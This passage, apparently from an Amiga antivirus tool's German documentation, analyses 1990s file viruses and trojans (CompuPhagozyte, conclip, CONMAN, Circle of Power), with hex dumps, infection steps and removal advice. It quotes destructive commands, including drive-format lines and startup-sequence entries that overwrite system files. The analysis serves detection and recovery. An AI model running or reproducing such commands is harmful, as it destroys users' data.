Verlaengert ein File um #1740 Bytes ($1b3x4). In File ist zu lesen: 732e6c69 62726172 7900436f 6d707550 s.library.CompuP 6861676f 4c696e6b 20627920 54686520 hagoLink by The ^^^^ 456d7065 726f7220 4f662054 72696c6c Emperor Of Trill 696f6e20 42797465 ff6c33ee ffe20007 ion Byte.l3..... VT sollte das Teil im Speicher erkennen und abschalten koennen. Die Virus-Routine enthaelt mehrere Fehlerquellen. Es duerften haeufig nicht lauffaehige oder nicht vermehrungsfaehige Files entstehen. VT bietet Ausbau an. Bitte machen Sie vorher eine Kopie. Sie MUESSEN mit der Meldung Hunk-Struktur-defekt rechnen. Danke !! - CompuPhagozyte 8 FileVirus Laenge: 1952 Bytes Im Speicher immer ab $7C000, Vektoren werden teilweise nach $7A000 gerettet. Cool $7C22A, DoIo $7C2C4, SumKickData $7C5F2, Open $7C3CA, Lock $7C3FA, LoadSeg $7C39A und $6C $7C68a . Wie Sie erkennen koennen sind im Vergleich zu Vorgaengerversionen noch mehr Vektoren verbogen und OldOpenLib wurde aufgegeben. Ob Nano2 von Compu 8 abgeschrieben ist oder umgekehrt oder ob es sich um den gleichen Programmierer handelt, kann ich nicht entscheiden. Sicher ist, dass die gleiche Fehlerquelle (s.u.) enthalten und der Ablauf gleich ist. Namensbegruendung: Im File ist decodiert zu lesen: The Emperor of Trillion Bytes presents:... a new CompuPhagozyte !!! Dieser Zeilen werden vom Programm nie decodiert. Das Virusteil versucht durch einen Text am Fileanfang zu ver- wirren: 20202020 203a416d :Am 69676144 4f532044 61746166 696c6520 igaDOS Datafile 40203139 38382062 79204342 4d202020 @ 1988 by CBM 20200a54 68697320 66696c65 20636f6e .This file con 7461696e 7320696d 706f7274 616e7420 tains important 6469736b 20646174 6120666f 72200042 disk data for .B 6c6f636b 20416c6c 6f636174 696f6e20 lock Allocation 21200a20 3e3e3e20 5741524e 494e473a ! . >>> WARNING: 2044656c 6574696f 6e206f66 20746869 Deletion of thi 73206669 6c652063 6f756c64 20006465 s file could .de 7374726f 7920616c 6c206469 736b2064 stroy all disk d 61746173 20212121 203c3c3c 0a00 atas !!! <<<.. Vermehrung: - Test ob unsichtbares File A0A0A0A0 schon da ist. Wenn ja keine Verseuchung (Fortschritt gegen frueheren Versionen) - Schreibt Virusteil in RootDir (festgelegt mit :) - Besorgt #1006 Bytes Speicher - Versucht :s/startup-sequence zu oeffnen und #1000 Bytes zu lesen. KEIN Test von d0 - Schreibt im Speicher 6 Bytes vor die startup-sequence A0A0A0A0200A - Schreibt #1006 Bytes auf Disk - Protect VirusFile und Startup-sequence Fehlerquellen: Da immer #1000 Bytes eingelesen und #1006 Bytes zurueck- geschrieben werden, treten Fehler auf. a) ihre s-seq. war kuerzer, dann wird der Rest mit Speichermuell zurueckgeschrieben und es gibt Meldungen wie xyz not executable weil zufaellig im Speichermuell etwas verwertbares stand. b) Ihre s-seq. war laenger, dann wird ein Teil abgeschnitten und Sie wundern sich, warum z.B. loadwb nicht mehr ge- startet wird. Fehlerquelle2 : Das Virusteil verraet sich nach einem Reset und schreibge- schuetzter Disk mit einem SystemRequest: Volume xyz is write protected VT loescht das VirusFile Bitte denken Sie daran, dass Sie mit einem Editor die 1.Zeile der startup-sequence loeschen muessen. Auf Grund der Fehler- quellen kann es aber auch sein, dass Sie die startup-sequence voellig neu schreiben muessen. Denken Sie bitte daran, dass Sie vorher in VT im Filerequester die startup-sequence un- protecten muessen !!!! - conclip-Virus Typ A: Laenge gepackt: 3248 Bytes Laenge entpackt: 2872 Bytes (ja die Zahlen stimmen) KEINE verbogenen Vektoren Vermehrung: ja Im entpackten File ist zu lesen z.B.: 2940fdac 41fa0006 2008600e 4446303a )@..A... .`.DF0: 632f636f 6e636c69 70002940 fdc0202c c/conclip.)@.. , ;...... 700f2f00 41fa0006 20086014 416d6967 p./.A... .`.Amig 61444f53 20434c49 2d457272 6f720000 aDOS CLI-Error.. ;...... 41fa0006 2008602a 4469736b 20636f72 A... .`*Disk cor 72757074 202d2070 6c656173 6520696e rupt - please in 73657274 20626f6f 74646973 6b2e2e2e sert bootdisk... ;...... fff441fa 00062008 60266563 686f2063 ..A... .`&echo c 6f6e636c 6970203e 6466303a 732f7374 onclip >df0:s/st 61727475 702d7365 7175656e 63650000 artup-sequence.. ;...... 60387275 6e203e4e 494c3a20 7379733a `8run >NIL: sys: 73797374 656d2f66 6f726d61 74203e4e system/format >N 494c3a20 44524956 45206864 303a204e IL: DRIVE hd0: N 414d4520 414e4459 00002e80 70002f40 AME ANDY....p./@ Betroffene Medien: DF0:, DF1:, DH0:, DH1:, HD0: u. HD1: Hinweis: das Conclip-File gibt es wirklich mit anderer Laenge. Ablauf: Ein Fenster wird geoeffnet. Titelleiste: AmigaDOS... siehe oben Ein Text wird ausgegeben: Disk corrupt ... siehe oben conclip wird nach c kopiert. Die startup-seq. wird veraendert. Conclip wird also danach nach jedem Reset aufgerufen. Das Formatieren meiner Festplatte habe ich nicht abgewartet (dos-delay). Es ist noch eine Textausgabe in diesem File, die ich aber nicht auf dem Bildschirm gesehen habe. VT bietet nur Loeschen an. Bitte vergessen Sie nicht, auch die startup-sequence zu aendern. Typ B: Laenge mehrfach gepackt: 6952 Bytes Laenge mehrfach entpackt: 6096 Bytes KEINE verbogenen Vektoren Mehrfach entpackt und mit "EORI.B #$42,(A2)+" behandelt ist im File zu lesen: 6f20746f 20626564 21290a0a 7c7c2042 o to bed!)..|| B 45412049 2057494c 4c204e45 56455220 EA I WILL NEVER 464f5247 45542059 4f552e20 52455354 FORGET YOU. REST 20494e20 58544320 7c7c0a0a 414e4459 IN XTC ||..ANDY 20544845 20484558 45522121 0a0a0a0a THE HEXER!!.... ;...... fdc87000 4e5d4e75 3a204e41 4d452041 ..p.N]Nu: NAME A 4e44595f 49535f42 41434b00 72756e20 NDY_IS_BACK.run 3e4e494c 3a207379 733a7379 7374656d >NIL: sys:system 2f666f72 6d617420 3e4e494c 3a204452 /format >NIL: DR 49564520 00496e73 65727420 626f6f74 IVE .Insert boot 6469736b 20696e20 4446303a 004e6f74 disk in DF0:.Not 20612044 4f532d64 69736b21 00537973 a DOS-disk!.Sys 74656d6d 656c6475 6e67003a 532f5374 temmeldung.:S/St 61727475 702d5365 7175656e 6365003a artup-Sequence.: 432f436f 6e436c69 70004446 30004446 C/ConClip.DF0.DF 31004844 31004448 31004844 30004448 1.HD1.DH1.HD0.DH 30005052 4f474449 523a636f 6e636c69 0.PROGDIR:concli 7000536e 6f6f7044 6f730053 4e4f4f50 p.SnoopDos.SNOOP 444f5300 74ff4e75 4e7541fa 0060216f DOS.t.NuNuA..`!o Aenderungen bei Typ B: Schreibt jetzt ConClip Testet auf SnoopDos Schreibt nach Speicherstelle #$0 HELP Schreibt nach Speicherstelle #$100 0100: DEADBABE BEA0FACE Dieser Text erscheint bei mir nach einem Tastaturreset auch in einem Alert. Wenn Sie einige Zeit warten, wird eine Graphik ausgegeben: - dunkler Hintergrund - in sehr grossen Buchstaben HEXER (rot ausser X ist blau) - in kleineren, hellen Buchstaben darunter: ANDY THE HEXER IS BACK... Spielen Sie den Original-conclip-Befehl nach c: und ueber- pruefen Sie auch ihre Startup-sequence. - ConfTop-Trojan gegen AmiExpress Laenge ungepackt: Conftop.000 38322 Bytes Conftop.020 38300 Bytes Falls es zu Verwechslungen mit einem echten Conftop-Prg kommt, rufen Sie mich bitte an und schicken mir ein Orig-ConfTop zu. Das Verhalten wurde nicht getestet, da ich kein AmiExpress habe. Fremdaussage: Entscheiden Sie selbst !!!!!! @BEGIN_FILE_ID.DIZ FAKE FAKE FAKE FAKE FAKE FAKE FAKE FAKE FAKE -------------------------------------------- BOBO/MYSTIC SAYS : I *NEVER* RELEASED THE CONF-TOP! NUKE AND BEAWARE OF THE FILE : 'MST-CF22.LHA'!!!.. IT *MAY* FORMAT YOU'RE HD! A BACKDOOR IS FOR SURE!!! IT'S AN OLD VERSION OF CONFTOP! /BOBO oF MYStIC! @END_FILE_ID.DIZ What?!... Ok... It goes like this!... The file 'MST-CF22.LHA' is a F A K E! I never done that! it's probably a hd crasher!... So DON'T use it! and NUKE it on every board! - CONMAN-BBS-Trojan Laenge gesamt: 50288 Bytes Typ A: Trojan-Teil gepackt: 2704 Bytes Trojan-Teil entpackt: 2496 Bytes Ein $4EB9-$4EF9-Link an ARTM 2.3 . 4f4b2021 00000000 414d4947 41205265 OK !....AMIGA Re 616c7469 6d65204d 6f6e6974 6f722056 altime Monitor V 322e3320 44617465 2039332f 31312f31 2.3 Date 93/11/1 3100434f 50595249 47485420 42592054 1.COPYRIGHT BY T Nach meinem Wissensstand gibt es im Nov. 93 diese Versions- nummer noch gar nicht. Es handelt sich um eine V1.6 . Namensbegruendung: decodiert ist im Speicher zu lesen: 434f4e4d 414e2f48 41434b4d 41535445 CONMAN/HACKMASTE 522f3933 2f54524f 4a414e2d 56495255 R/93/TROJAN-VIRU 53092e2e 00000000 00000000 00000000 S............... Das Gesamtfile lauft nur auf Prozessoren ab 68020 ohne GURU, da im Trojan-Teil ungerade Adressen verwendet werden. Schaeden: Sucht nach USER.KEYS und USER.DATA. Diese Files sollen mit dosopen, dosread, doswrite und dosclose bearbeitet werden. Hinweis: Es wird das $4EB9-$4EF9-Link-Programm gesucht. Da Ende Nov 93 schlagartig mehrere solche Links aufgetaucht sind, vermute ich, das es dafuer ein Programm gibt. Das Link-Prg. scheint nicht sehr gut zu sein . Siehe Hinweis 2 Hinweis 2: VT bietet Ausbau an. ABER !!!!!! ARTM1.6-Orig ARTM2.3-Link 000: 000003ec 0000018a ........ 000: 000003ec 0000018a ........ 008: 00000001 000046be ......F. 008: 00000005 0000009c ........ 010: 0000469c 000011ac ..F..... 010: 000000cc 000000e6 ........ 018: 000008c0 000008bc ........ 018: 00000104 00000132 .......2 020: 00002100 000020fc ..!... . 020: 0000014e 0000020c ...N.... 028: 000020f8 000020f4 .. ... . 028: 00000210 00000220 ....... 030: 000020f0 000020ec .. ... . 030: 00000224 00000234 ...$...4 Es werden also voellig wirre Zahlen in die 3EC-Hunks geschrieben. VT stellt zwar die Hunkzahl bei $8 (5 wird zu 1) richtig, ueber- nimmt aber die geaenderten FALSCHEN Werte. Die uneingeschraenkte Lauffaehigkeit des Prg.s wird angezweifelt. Besser Sie loeschen das gelinkte ARTM-Prg. ganz und besorgen sich ein Orig-ARTM . - CONMAN-BBS-Trojan Typ B Maerz 94: Es sollen mehrere Files aufgetaucht sein, in denen Conman zu lesen ist. Es soll versucht werden, user.data zu ver- aendern. Da bisher immer mit 4EB9-4EF9-Links gearbeitet wurde, seien Sie bitte etwas vorsichtig, falls VT dies anzeigt. Gefahr besteht aber nur fuer AMI-BBS . - CONMAN-Dir-Trojan File gepackt: 4004 Bytes VT bietet bei Filetest Loeschen an. entpackt: 8456 Bytes VT bietet bei Filetest Ausbau an. KS2.04 mit 68030: ja VT sollte den Process im Speicher finden. VT bietet Loeschen an. Sie muessen mit GURU rechnen. Haengt an einem Dir-Befehl. Das RTS im Dir-Befehl wurde durch ein JMP Virusteil ersetzt (von Hand ?). Im Virusteil wird jsr -$xy(A5) verwendet. Im Speicher ist zu lesen: 576f726b 62656e63 68200064 6f732e6c Workbench .dos.l 69627261 72790069 6e747569 74696f6e ibrary.intuition 2e6c6962 72617279 00444630 3a432f44 .library.DF0:C/D 49520043 3a444952 00444556 533a5359 IR.C:DIR.DEVS:SY 5354454d 2d434f4e 46494755 52415449 STEM-CONFIGURATI 4f4e0043 3a4c4f41 44574200 4c3a5241 ON.C:LOADWB.L:RA 4d2d4841 4e444c45 5200536e 6f6f7044 M-HANDLER.SnoopD 6f7300b6 b6b6b6b6 b6b6b6b6 b6b6b6b6 os.............. Ablauf: - SnoopDos wird gesucht und falls gefunden abgeschaltet. (Signal) - Ein Process mit Namen "Workbench " wird angelegt. Vermehrung: ^ Das Virusteil wird nach $70000 im Speicher kopiert und von da als Dir geschrieben. Schaeden: Sobald eine Zaehlzelle den Wert 7 erreicht hat wird geloescht: - devs:system-configuration - c:loadwb - l:ram-handler Danach wird ein Text mit move.b (a0)+,(a1)+ eori.b #$96,(a0) decodiert und mit DisplayAlert ausgegeben. 20202020 20205448 49532049 53204e4f THIS IS NO 54204120 53595354 454d2041 4c455254 T A SYSTEM ALERT 21205448 49532049 53205448 45204e45 ! THIS IS THE NE 5720434f 4e4d414e 2d54524f 4a414e20 W CONMAN-TROJAN 56495255 53212020 20202020 20202020 VIRUS! ;.... 20202041 4c4c2044 49534b20 41435449 ALL DISK ACTI 56495449 45532057 494c4c20 42452044 VITIES WILL BE D 49534142 4c454421 20202020 20202020 ISABLED! ;usw. Zuletzt geht das Programm in eine Endlosschleife. D.h. Sie muessen einen Tastatur-Reset ausfuehren. - CONMAN-Dir-Inst ???? VT glaubt (!!!!!!!! aber NICHT sicher) ein File gefunden zu haben, an das mit der $4EB9-4EF9-Methode ein Virusteil an- gelinkt wurde. Loeschen Sie also bitte nicht sofort das File, sondern untersuchen Sie zuerst das Teil. Falls das File ge- packt ist, dann entpacken Sie es mit einem Entpacker ihrer Wahl. Falls Sie nun mit einem Filemonitor oder mit VT-Filereq das File anschauen und den Text CONMAN finden, so duerfte es sich um ein verseuchtes File handeln. Fuer die Zusendung waere ich dankbar (vorher anrufen). - CONMAN-HYPER-Trojan Einbruchswerkzeug in BBS Typ A: Laenge gepackt: 1948 Bytes Laenge ungepackt: 1380 Bytes Z.B. vor WorldClock (siehe unten) gelinkt. Im File ist zu lesen: 00000000 00000000 00000000 4242533a ............BBS: 55534552 2e444154 41004242 533a5553 USER.DATA.BBS:US 45522e4b 45595300 646f732e 6c696272 ER.KEYS.dos.libr 61727900 41452e4d 61737465 7200434f ary.AE.Master.CO 4e4d414e 00000000 00000000 00000000 NMAN............ ;...... 00000000 00008948 59504552 00000000 .......HYPER.... Keine verbogenen Vektoren. Kein neuer Process im Speicher. Kein Befehl wird ins C-Verzeichnis geschrieben. Das Teil ist "nur" fuer Sysops gefaehrlich. VT bietet Loeschen an, falls Sie das Teil je einzeln finden. Das Teil schreibt fuer die Selbsterkennung #$2B mach $00000000. Das Teil sucht nach einem AE.Master-Port. Falls nicht gefunden, Ende. Danach wird versucht USER.DATA und USER.KEYS auszulesen. - CONMAN-Iprefs-Inst. File Filename: HACKT.EXE Laenge gepackt: 12692 Bytes Laenge entpackt: 12312 Bytes KEINE verbogenen Vektoren NICHT resetfest VT bietet nur Loeschen an, da nichts sinnvolles im File ist. Im entpackten File wurden mit der $4EB9-4EF9-Methode ein "Dunkel- schalter" und ein verseuchtes Iprefs zusammengelinkt. Ablauf bei mir: - Bildschirm dunkel schalten - verseuchtes Iprefs nach c: kopieren - nach kurzer Zeit Reset (dadurch wird Iprefs aus startup-seq aufgerufen). - CONMAN-Iprefs-Trojan File Filename: Iprefs Laenge gepackt: 10820 Bytes Laenge entpackt: 14216 Bytes KEINE verbogenen Vektoren NICHT resetfest Kann sich NICHT weiterkopieren VT bietet nur Loeschen an, da jeder auf der Orig-WB-Disk ein sauberes Iprefs-File hat. Im Iprefsfile befindet sich mit der $4EB9-4EF9-Methode zusammen- gelinkt zuerst Iprefs und DANACH das Trojanteil. Trojanteil noch einmal gepackt: 1184 Bytes Trojanteil entpackt: 1584 Bytes Im entpackten Trojanteil ist zu lesen: 722941f9 00000274 20fc2043 4f4e20fc r)A....t . CON . 4d414e20 20fc3139 393551c9 ffec13fc MAN .1995Q..... ;....... 74726163 6b646973 6b2e6465 76696365 trackdisk.device 0000636f 6e6d616e 2e646576 69636500 ..conman.device. 646f732e 6c696272 61727900 000003ec dos.library..... Schadensverlauf: - Zuerst wird das Iprefsteil ausgefuehrt. - Danach wird das Trojanteil aktiviert. - Startet Prozess Prozessname: conman.device Dieser Prozess versucht ueber trackdisk.device (also nur Disk), Block 880, 882 und andere Blocknummern in Abhaengigkeit von $DFF006 zu zerstoeren. Fuer eine Testdisk habe ich 10 Min. ge- braucht. Danach war KEIN Prg. mehr lauffaehig. Im zerstoerten Block ist zu lesen: Block: 882 0000: 00434f4e 4d414e20 31393935 20434f4e .CONMAN 1995 CON 0010: 4d414e20 31393935 20434f4e 4d414e20 MAN 1995 CONMAN 0020: 31393935 20434f4e 4d414e20 31393935 1995 CONMAN 1995 ;usw. Sie sehen, da ist nichts mehr zu retten. Tut mir leid. Warum ein zerstoerter Block bei mir IMMER mit $0 anstatt $20 beginnt? Keine Ahnung. VT versucht den Prozess abzuschalten. Sie muessen aber mit einem Guru rechnen. Danke - CONMAN-LoadWB-Inst. File Typ A: Filename:recode Filelaenge ungepackt: 12088 Bytes Keine verbogenen Vektoren Nicht resetfest Es werden Befehle aus der dos.lib verwendet (inhibit, format), die erst ab KS #37 vorhanden sind. Mit der 4EB9-Methode wurden ein Programm (Cable) und das Trojan- teil zusammengelinkt. Im File ist zu lesen: 61727900 434c4928 30293a6e 6f20636f ary.CLI(0):no co 6d6d616e 64206c6f 61646564 00433a4c mmand loaded.C:L 6f616457 42000000 oadWB... VT bietet Ausbau an. Es sollte ein PP-gepacktes File mit der Laenge 9176 Bytes entstehen. Was man mit dem Cable-Prg V0.8 machen kann ? Keine Ahnung. Ablauf: Suche nach CLI(0)-Prozess. Falls da Ende Lege Prozess im Speicher an. Loadwb wird geschrieben. s.u. CONMAN-LoadWB-Troj. Zeitpause Reset ueber Exec.lib Typ B: Filename:QUARTEX Filelaenge ungepackt: 24596 Bytes Filelaenge ausgebaut: 21712 Bytes Es handelt sich um einen Filemonitor. Richtiger Name: HEX Rest siehe bei Typ A - CONMAN-LoadWB-Trojan File Filelaenge gepackt: 2088 Bytes Filelaenge entpackt: 2124 Bytes VT bietet nur loeschen an. Jeder sollte einen Original-LoadWB auf einer Disk an einem sicheren Ort haben. Bei einem Vergleich mit der VT-Funktion finden sie nach dem Entpacken: (Die Verschiebung um vier ist notwendig, da im Trojan- file im Header ein Hunk mehr eingetragen ist) Start 2.Obj.: +# 4 ;Orig WB ;Trojan ;...... 250: 4cec4e5d 4e75646f L.N]Nudo 254: 4cec4e5d 4eb90000 L.N]N... ^^^^ ^^^^^^^^ 258: 732e6c69 62726172 s.librar 25c: 00004e75 646f732e ..Nudos. ^^^^^^^^ 260: 79002d44 45425547 y.-DEBUG 264: 6c696272 61727900 library. 268: 2f532c44 454c4159 /S,DELAY 26c: 2d444542 55472f53 -DEBUG/S 270: 2f532c43 4c45414e /S,CLEAN 274: 2c44454c 41592f53 ,DELAY/S 278: 55502f53 2c4e4557 UP/S,NEW 27c: 2c434c45 414e5550 ,CLEANUP 280: 50415448 2f530024 PATH/S.$ 284: 2f532c4e 45575041 /S,NEWPA 288: 5645523a 206c6f61 VER: loa 28c: 54482f53 00245645 TH/S.$VE 290: 64776220 33382e39 dwb 38.9 294: 523a206c 6f616477 R: loadw 298: 20283330 2e332e39 (30.3.9 29c: 62203338 2e392028 b 38.9 ( 2a0: 32290a0d 0000776f 2)....wo 2a4: 33302e33 2e393229 30.3.92) Es handelt sich also um einen Orig-LoadWB-Befehl. Nur wurde ein RTS um sechs Bytes verschoben und davor ein Sprungbefehl zum Trojanteil eingebaut. Ausserdem mussten deshalb natuerlich einige andere Sprungbefehle erhoeht werden. Ich nehme an von Hand. Entpackt und Teile decodiert mit eori.b #$96,(a1) .... ist im Trojanteil zu lesen: 00000000 533a434f 4e4d414e 0000696e ....S:CONMAN..in 74756974 696f6e2e 6c696272 61727900 tuition.library. 434c4928 30293a6e 6f20636f 6d6d616e CLI(0):no comman 64206c6f 61646564 00005359 533a0000 d loaded..SYS:.. 20004241 440000c8 11434f4e 4d414e53 .BAD....CONMANS 20535953 4b494c4c 4552204d 45535341 SYSKILLER MESSA 47453a00 0100501b 594f5520 42455454 GE:...P.YOU BETT 45522054 414b4520 43415245 20444f4f ER TAKE CARE DOO 44494520 2d20534f 46545741 52452d50 DIE - SOFTWARE-P 49524143 59204953 20412043 52494d45 IRACY IS A CRIME 21200000 ! .. Ablauf: Der Original-LoadWB-Befehl wird abgearbeitet und vor einem RTS zuerst in den Trojanteil gesprungen. CLI(0)-Prozess schon da dann Ende Cmpi.w #$25,$14(a6) mind KS 37 sonst Ende Dann Prozess-Aufbau Im Prozess: Suche nach S:CONMAN (also eine schon bekannte Variante der Selbstsicherung fuer den Programierer). Falls gefunden Ende DosDelay $5000 = mehr als vier Minuten Inhibit SYS: Format (aus dos.lib) SYS: Name " " (s.o. 2000) BB mit BAD0 . Also ein Format QUICK der Block 0 und die Root veraendert. Zwei Zeilen DisplayAlert: CONMANS SYSK..... siehe oben. Nach einem Reset handelt es sich also um ein NoDOS-Medium. Versuchen Sie Ihre Festplatte oder Disk zu retten, indem Sie z.B. DiskSalv einsetzen. VT versucht den Prozess im Speicher zu finden und abzuschalten. Es koennte dabei zu einem GURU kommen. Da der Prozess aber nur 4 + X Minuten aktiv ist, bevor er sein Zerstoerungswerk beginnt, kann VT das Teil im Speicher nur gleich nach dem laden der WB finden. Hinweis: Wenn Sie die Programme im c-Verzeichnis mit VT-Prefs mit einer Pruefsumme versehen hatten, so muessen AUCH schon aeltere VTs beim veraenderten LoadWB-Befehl warnen. Ueber- legen Sie sich also bitte, ob Sie nicht ein Minimum an Vor- sorge betreiben wollen. Oder versehen Sie alle C-Programme mit dem gleichen Datum (copy c: ram:test all und zurueck). Wenn Sie dann in VT-Prefs Datum einstellen werden Sie auch auf den veraenderten LoadWB-Befehl aufmerksam, obwohl aeltere VTs diesen Trojan noch gar nicht kannten. UND !!!! 4EB9-Files sollten Sie IMMER vorsichtig werden lassen !!!!! Bitte lesen Sie (oben) bei 4EB9-Files nach. - CONMAN-LOOK-Trojan anderer Name: LOOK-BBS-Trojan s.u. - CONMAN-WorldClock-Trojan gegen BBS Laenge ungepackt: 21396 Bytes Filename: WorldClock (V1.16) Im File ist zu lesen: 00000000 24564552 3a20576f 726c642d ....$VER: World- 436c6f63 6b205631 2e313620 284e6f76 Clock V1.16 (Nov 20313320 31393934 2031343a 31313a32 13 1994 14:11:2 Mit der $4EB9-$4EF9-Link-Methode wurde ein Einbruchswerkzeug vor WorldClock gelinkt. Nennen wir das Trojan-Teil CONMAN-HYPER Typ A (siehe oben). Das Teil ist also nur fuer Sysops gefaehr- lich. Keine verbogenen Vektoren. Kein neuer Prozess im Speicher. Es wird KEIN Befehl ins C-Verzeichnis geschrieben. VT bietet nur loeschen an, da mindestens (Stand Maerz 95) schon WorldClock V1.18 erschienen ist. - COP-Trojan CIRCLE OF POWER Zerstoerungsfile KEINE Vermehrung KEINE verbogenen Vektoren Mit der $4EB9-$4EF9-Linkmethode wurde ein Zerstoerungsteil an andere Programme angelinkt. Die jeweiligen Versionsnummern duerfte es im Maerz 95 nicht geben. Deshalb bietet VT NUR Loeschen an und nicht Ausbau. Schaeden: Files in bestimmten Verzeichnissen werden gekuerzt und enthalten nur noch einen Text. siehe unten Da ist NICHTS mehr zu retten. Tut mir leid. Typ A: (weil er zuerst entdeckt wurde) Laenge des Zerstoerungsteils: 1920 Bytes Entdeckt an NComm32 Laenge gepackt: 121896 Bytes Laenge entpackt: 226116 Bytes Im entpackten File ist zu lesen: 4eaeffa6 70004cdf 400c4e75 43495243 N...p.L.@.NuCIRC 4c45204f 4620504f 57455220 31393935 LE OF POWER 1995 2100733a 00004e71 2f077e00 60144a2c !.s:..Nq/.~.`.J, ;..... ^^ 4eaeffa6 70004cdf 400c4e75 43495243 N...p.L.@.NuCIRC 4c45204f 4620504f 57455220 31393935 LE OF POWER 1995 21006262 733a0000 2f077e00 60144a2c !.bbs:../.~.`.J, ;..... ^^^^ 523a204e 436f6d6d 20332e32 20203138 R: NComm 3.2 18 2d4d6172 2d393500 00004e43 6f6d6d20 -Mar-95...NComm Files aus s: und bbs: (siehe oben) werden auf 21 Bytes gekuerzt. In so einem File ist dann zu lesen: 0000: 43495243 4c45204f 4620504f 57455220 CIRCLE OF POWER 0010: 31393935 21 1995! Typ B: Laenge des Zerstoerungsteils: 1904 Bytes Entdeckt an LHA3.0 Laenge gepackt: 69888 Bytes Laenge entpackt: 105808 Bytes Entdeckt an CED4 Laenge gepackt+3E8-Hunk: 174500 Bytes Laenge entpackt: 314216 Bytes Hier wurde also sogar noch ein 3E8-Hunk vorgehaengt um die Packererkennung zu erschweren. Im File ist jeweils zu lesen: 4cdf400c 4e756465 76733a00 733a0000 L.@.Nudevs:.s:.. 656e7661 72633a00 6e636f6d 6d3a0000 envarc:.ncomm:.. 6c696273 3a004349 52434c45 204f4620 libs:.CIRCLE OF 504f5745 52273935 3a004e71 2f077e00 POWER'95:.Nq/.~. Files aus devs: s: envarc: ncomm: und libs: werden auf 19 Bytes gekuerzt. In so einem File ist dann zu lesen: z.B. arp.library 0000: 43495243 4c45204f 4620504f 57455227 CIRCLE OF POWER' 0010: 39353a 95: Hinweis: sollte ein Verzeichnis nicht existieren, so hat das Teil sich bei mir durch einen Requester verraten. Typ C: Entdeckt an DOpus5 Laenge gepackt+3E8-Hunk: 347296 Bytes Laenge entpackt: 547676 Bytes Hier wurde also sogar noch ein 3E8-Hunk vorgehaengt um die Packererkennung zu erschweren. Im File ist zu lesen: 4cdf400c 4e756465 76733a00 733a0000 L.@.Nudevs:.s:.. 6c696273 3a00434f 50273935 00004e71 libs:.COP'95..Nq Files aus devs: s: und libs: werden auf 6 Bytes gekuerzt. In so einem File ist dann zu lesen: z.B, diskfont.library 0000: 434f5027 39350000 00000000 00000000 COP'95.......... Da ist leider NICHTS mehr zu retten. Hinweis: Bei Tests wurden auch zerstoerte Files mit der Laenge 0 erzeugt. - COP-Sinfo-Trojan (COP Typ D ???) Zerstoerungsteil Laenge ungepackt: 2852 Bytes Filename: Sinfo Keine verbogenen Vektoren Das File kann Sich SELBST NICHT vermehren. Unterschied zu anderen COP-Typen: Eigenstaendiges Programm und NICHT angelinkt. In der File-ID wird behauptet: SYSTEMINFO V1.0 BY JÜRGEN HÜNSMANN 1995! Das Trojanteil ist teilweise codiert. Die startup-sequence wird veraendert: startup-sequence vorher: ;cls startup-sequence nachher: list s: >ram:cop lformat "echo cop! >s:%n" execute ram:cop list libs: >ram:cop lformat "echo cop! >libs:%n" execute ram:cop list c: >ram:cop lformat "echo cop! >c:%n" execute ram:cop sys:system/format >nil: drive sys: name suckmycop! ffs noicons quick ;cls Es werden also vor der echten startup-sequence einige Zeilen einge- fuegt. Diese Zeilen werden nach einem Reset zuerst abgearbeitet. Im Ram entsteht ein File cop mit dem Inhalt am Schluss: echo cop! >c:List echo cop! >c:Run echo cop! >c:AddBuffers echo cop! >c:Mount echo cop! >c:LoadWB echo cop! >c:CD echo cop! >c:Execute echo cop! >c:cls echo cop! >c:Echo echo cop! >c:NewCLI echo cop! >c:EndCLI echo cop! >c:Makedir echo cop! >c:546071 echo cop! >c:546043 echo cop! >c:RunBack echo cop! >c:Dir Wenn Sie noch mehr in c: stehen haben, wuerden da noch mehr Zeilen stehen. Hinweis: mit Workbenchbefehlen in c: von KS1.3 werden nur Files mit Zahlennamen z.B. 546071 s.o. erzeugt, aber nichts zerstoert. Mit neueren Workbenchbefehlen: Die Unterverzeichnisse s, libs und c werden durchlaufen und alle gefundenen Files auf 5 Bytes gekuerzt. Inhalt danach z.B.: CD 0000: 636f7021 0a000000 00000000 00000000 cop!............ Tut mir leid, da ist nichts mehr zu retten. Die "format-Zeile" in der startup-sequence wurde bei Tests bei mir NIE ausgefuehrt, sondern mit returncode 20 abgebrochen. VT bietet nur loeschen an, da Sinfo keine andere Funktion hat. Bitte ueberpruefen Sie UNBEDINGT auch ihre startup-sequence und entfernen Sie bei Bedarf die ersten Zeilen. - COP-FT-Trojan Typ E Zerstoerungsfile Bekannte Filenamen: FutureTracker Laenge ungepackt: 317608 Bytes Virusworkshop V5.0 Laenge ungepackt: 135744 Bytes Im Netz war zu lesen, dass die jeweiligen Programmierer die Files NICHT geschrieben haben. KEIN File enthaelt das Programm, das wegen des Filenamens vermutet werden koennte. Das File besteht jeweils aus der COP-Zerstoerungsroutine und einem Musikstueck. Keine verbogenen Vektoren Die Files koennen Sich SELBST NICHT vermehren. Decodiert (NOT.B D0) ist im File zu lesen: 04c70000 00000000 0152434f 4e3a302f .........RCON:0/ 30302f31 30303030 2f313030 30302f43 00/10000/10000/C 6f646564 20627920 4b68616e 616e2028 oded by Khanan ( ;....... 701b5b33 303b3430 6d5b634f 705d3a20 p.[30;40m[cOp]: 4b68616e 616e202f 20436972 636c6520 Khanan / Circle 4f662050 6f776572 203a5b63 4f705d64 Of Power :[cOp]d 6576733a 00733a00 656e7661 72633a00 evs:.s:.envarc:. 4c3a004e 434f4d4d 3a00 L:.NCOMM:. Ablauf: Es wird ein Fenster geoeffnet und ein COP-Text ausgegeben. Das MUSS dem User auffallen. Empfehle sofort RESET. Vielleicht ist der Schaden noch zu begrenzen. Vorsicht: die Festplatte duerfte dann allerdings Validating-Probleme haben. Die Files in devs, s, envarc, L und NCOMM werden auf 38 Bytes gekuerzt. Inhalt danach z.B.: Port-Handler 0000: 5b634f70 5d3a204b 68616e61 6e202f20 [cOp]: Khanan / 0010: 43697263 6c65204f 6620506f 77657220 Circle Of Power 0020: 3a5b634f 705d0000 :[cOp].. Tut mir leid, da ist nichts mehr zu retten. - COP-Acp-Trojan Typ F Zerstoerungsfile acp Laenge: 71904 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Taeuschung durch File-ID: AmiExpress 5.0 Sehr starke Aehnlichkeit mit Typ E. Decodiert (NOT.B D0) ist im File zu lesen: 434f4e3a 302f3030 2f313030 30302f35 CON:0/00/10000/5 302f436f 64656420 6279204b 68616e61 0/Coded by Khana 6e202620 4772616a 73616820 2863292d n & Grajsah (c)- ;....... 20202020 20202020 3a5b634f 705d0a5b :[cOp].[ 634f705d 3a204b68 616e616e 